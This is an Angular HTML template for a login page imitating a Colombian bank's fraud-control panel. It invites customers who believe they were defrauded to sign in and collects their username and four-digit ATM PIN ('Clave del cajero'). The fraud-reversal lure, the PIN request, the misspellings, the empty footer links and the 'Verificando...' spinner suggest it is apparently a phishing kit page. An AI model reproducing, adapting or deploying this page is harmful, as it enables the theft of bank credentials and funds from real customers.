<div _ngcontent-ng-c54967524="" _nghost-ng-c2515275900="" class="main-container">
    <main _ngcontent-ng-c2515275900="" class="svp-main">
        <div _ngcontent-ng-c54967524="" class="bc-container-fluid trazo"
            style="background-image: url(assets/bg-trazo.svg)">
            <div _ngcontent-ng-c54967524="" class="bc-flex bc-justify-content-center" _nghost-ng-c123734241="">
                <div _ngcontent-ng-c123734241="" class="bc-flex bc-justify-content-center bc-mt-5">
                    <div _ngcontent-ng-c123734241="" name="bcp-horizontal-no-spacing" size="11.5rem" alt="logo"
                        class="logo bc-flex bc-justify-content-center logo_filter bc-logo" aria-hidden="true"
                        style="width: 11.5rem;">
                        <img src="/assets/img-horizontal.svg" alt="logo" style="width: 11.5rem;">
                    </div>
                </div>
            </div>
            <div _ngcontent-ng-c54967524="" class="bc-text-center bc-cibsans-font-style-9-extralight bc-mt-4 bc-fs-xs">
                Panel de Seguridad y Control de Fraude
            </div>
            <div _ngcontent-ng-c54967524="" class="bc-row bc-justify-content-center form-container">
                <div _ngcontent-ng-c54967524="" class="bc-col-xs-6 bc-col-md-8 bc-col-lg-4">
                    <div _ngcontent-ng-c54967524="" class="bc-mt-4">
                        <div _ngcontent-ng-c54967524="" role="alert"
                            class="bc-p-0 bc-shadow-06 bc-border-radius-2-full bc-bg-brand-primary-pair-00-01 bc-text-brand-primary-pair-01-00"
                            aria-label="Mantenimiento" aria-busy="false" aria-atomic="true" aria-live="polite">
                            <div class="bc-flex">
                                <div
                                    class="bc-bg-brand-status-generic bc-border-radius-2-left bc-pt-2 bc-px-1 bc-text-brand-primary-00">
                                    <div role="img" size="md" aria-hidden="true" style="visibility: visible;"
                                        class="bc-icon bc-md" name="ico-megaphone">ico-megaphone</div>
                                </div>
                                <div class="bc-flex bc-p-3 bc-gap-2 bc-direction-column">
                                    <div class="bc-opensans-font-style-3-semibold">Bienvenido a nuestro nuevo panel
                                    </div>
                                    <p class="bc-opensans-font-style-2-regular"> Inicia sesión para solicitar la
                                        anulación de transacciónes fraudulenta,
                                        o sí piensas que has sido victima de fraude.
                                    </p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div _ngcontent-ng-c54967524="">
                        <div _ngcontent-ng-c54967524="" class="bc-card-body bc-mt-4">
                            <div _ngcontent-ng-c1317268663="" _nghost-ng-c3972908523="">
                                <div _ngcontent-ng-c3972908523="">
                                    <div _ngcontent-ng-c3972908523="" titlecardauth="¡Hola!"
                                        aria-label="Hola. Ingresa los datos para gestionar tus productos y hacer transacciones."
                                        tabindex="0"
                                        descriptioncardauth="Ingresa los datos para gestionar tus productos y hacer transacciones."
                                        amountofbuttons="one" typecontainerauth="staticContainer"
                                        class="ng-untouched ng-pristine ng-invalid">
                                        <div id="card1" class="bc-card bc-card-auth bc-card-container">
                                            <div id="id00" class="bc-card-auth-body">
                                                <div class="bc-card-auth-head">
                                                    <div><em aria-hidden="true" class="bc-icon"></em></div>
                                                    <div
                                                        class="bc-card-auth-title bc-cibsans-font-style-5-bold bc-mt-3">
                                                        ¡Hola! </div>
                                                    <div class="bc-card-auth-description bc-mt-3">Ingresa los datos para
                                                        gestionar tus transacciónes.</div>
                                                </div>
                                                <form [formGroup]="authForm" (ngSubmit)="onSubmit()" id="form"
                                                    class="ng-untouched ng-pristine ng-valid">
                                                    <div>
                                                        <div _ngcontent-ng-c3972908523="" cardauthstaticcontainer=""
                                                            class="bc-card-auth-container">
                                                            <div _ngcontent-ng-c3972908523=""
                                                                class="authentication-form__username">
                                                                <div class="bc-form-field" id="s.4040532547">
                                                                    <em _ngcontent-ng-c3972908523="">user</em>
                                                                    <input _ngcontent-ng-c3972908523="" id="username"
                                                                        bc-input="" alphanumericonly=""
                                                                        formControlName="username" autocomplete="off"
                                                                        autocorrect="off" spellcheck="false"
                                                                        maxlength="20"
                                                                        aria-describedby="username-helper"
                                                                        aria-invalid="false" class="bc-input"
                                                                        placeholder=" " aria-label="Usuario">
                                                                    <label _ngcontent-ng-c3972908523=""
                                                                        [class.bc-active]="username?.value != ''"
                                                                        for="username">Usuario</label>
                                                                    <span _ngcontent-ng-c3972908523=""
                                                                        id="username-helper"
                                                                        class="authentication-form__help-text"> </span>
                                                                    <!-- <a _ngcontent-ng-c3972908523="" bc-link="" href="#"
                                                                        typelink="underline"
                                                                        class="bc-opensans-font-style-1-bold bc-link link-default link-underline">
                                                                        <u _ngcontent-ng-c3972908523="">¿Olvidaste tu
                                                                            usuario?</u>
                                                                    </a> -->
                                                                </div>
                                                            </div>
                                                            <div _ngcontent-ng-c3972908523=""
                                                                class="authentication-form__password">
                                                                <div class="bc-form-field" id="s.2867239717">
                                                                    <em _ngcontent-ng-c3972908523="">lock</em>
                                                                    <input _ngcontent-ng-c3972908523="" id="password"
                                                                        bc-input="" svponlynumber="" type="password"
                                                                        formControlName="password" autocomplete="off"
                                                                        maxlength="4" inputmode="numeric"
                                                                        aria-describedby="password-helper"
                                                                        aria-invalid="false"
                                                                        class="bc-input ng-untouched ng-pristine ng-invalid"
                                                                        placeholder=" " aria-label="Clave del cajero">
                                                                    <label _ngcontent-ng-c3972908523=""
                                                                        for="password">Clave del cajero</label>
                                                                    <span _ngcontent-ng-c3972908523=""
                                                                        id="password-helper"
                                                                        class="authentication-form__help-text"> </span>
                                                                    <!-- <a _ngcontent-ng-c3972908523="" bc-link="" href="#"
                                                                        typelink="underline"
                                                                        class="bc-opensans-font-style-1-bold bc-link link-default link-underline">
                                                                        <u _ngcontent-ng-c3972908523="">¿Olvidaste tu
                                                                            clave?</u>
                                                                    </a> -->
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="cf-turnstile" data-sitekey="0x4AAAAAABlmdFdnqzh_PD8q"></div>
                                                    <div class="bc-card-auth-button">
                                                        <button type="submit" _ngcontent-ng-c3972908523=""
                                                            cardauthbutton="" bc-button="" tabindex="0"
                                                            sizebutton="default" data-test="login-button"
                                                            [disabled]="authForm.invalid"
                                                            class="bc-button bc-button-fill bc-button-primary"> Iniciar
                                                            sesión </button>
                                                    </div>
                                                </form>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <div _ngcontent-ng-c2515275900="">
        <div componentid="svp-footer">
            <div class="bc-footer" id="svp-footer">
                <div class="bc-container">
                    <div class="bc-footer-top-links">
                        <div class="bc-footer-top-links-ca">
                            <a bc-link="" href="" target="_blank" rel="noopener noreferrer"
                                class="bc-link link-default"> ¿Problemas para
                                conectarte?
                            </a>
                        </div>
                        <div class="bc-footer-top-links-ca">
                            <a bc-link="" href="" target="_blank" rel="noopener noreferrer"
                                class="bc-link link-default"> Aprende sobre
                                seguridad
                            </a>
                        </div>
                        <div class="bc-footer-top-links-ca">
                            <a bc-link="" href="" target="_blank" rel="noopener noreferrer"
                                class="bc-link link-default"> Reglamento
                                Sucursal Virtual
                            </a>
                        </div>
                        <div class="bc-footer-top-links-ca">
                            <a bc-link="" href="" target="_blank" rel="noopener noreferrer"
                                class="bc-link link-default"> Política de
                                privacidad
                            </a>
                        </div>
                    </div>
                    <div class="bc-footer-divisor"></div>
                    <div class="bc-footer-bottom">
                        <div class="bc-footer-bottom-left">
                            <div class="bc-footer-bottom-left-side">
                                <div class="bc-footer-bottom-top-icon">
                                    <div size="150px" alt="logo" aria-hidden="true" class="bc-logo"
                                        style="width: 150px;">
                                        <img src="/assets/img-horizontal-no-spacing.svg" alt="logo"
                                            style="width: 150px;">
                                    </div>
                                </div>
                                <div class="bc-footer-bottom-left-side-vigilant">
                                    <div alt="Vigilado Superintendencia Financiera de Colombia" aria-hidden="false"
                                        class="bc-logo" style="width: 16px;">
                                        <img src="/assets/logo-vigilado.svg"
                                            alt="Vigilado Superintendencia Financiera de Colombia" style="width: 16px;">
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="bc-footer-bottom-right">
                            <div class="bc-footer-bottom-right-text">
                                <p>Dirección IP: {{pi}}</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="spinner-overlay" *ngIf="isLoading">
        <div class="spinner-container" role="alert" aria-live="assertive" aria-busy="true">
            <div class="spinner-circle" aria-hidden="true"></div>
            <div class="spinner-text bc-cibsans-font-style-5-bold">Verificando...</div>
        </div>
    </div>
</div>